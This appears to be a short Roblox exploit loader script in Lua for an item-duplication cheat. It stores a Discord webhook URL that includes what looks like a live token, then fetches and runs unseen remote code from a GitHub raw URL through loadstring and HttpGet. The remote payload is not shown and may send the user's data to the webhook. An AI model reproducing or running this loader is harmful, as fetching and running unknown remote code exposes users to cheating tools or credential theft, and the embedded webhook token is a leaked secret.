local Webhook = "https://discord.com/api/webhooks/1437449320675934441/X41a3FI7FVm4UCpwfBbp0sZFOocBG1szzBjmi0SF68CZ-R4anrfM4p_C0is-MqfRlBy7"

getgenv().UserPingThreshold = 50000000


-- =================================================================================
--      SCRIPT LOADER - DO NOT EDIT BELOW THIS LINE
-- =================================================================================

if Webhook and Webhook:match("discord.com/api/webhooks") then
    getgenv().UserWebhookURL = Webhook
else
    return
end

loadstring(game:HttpGet('https://raw.githubusercontent.com/LXZRz/dupe/main/dupe.lua', true))()
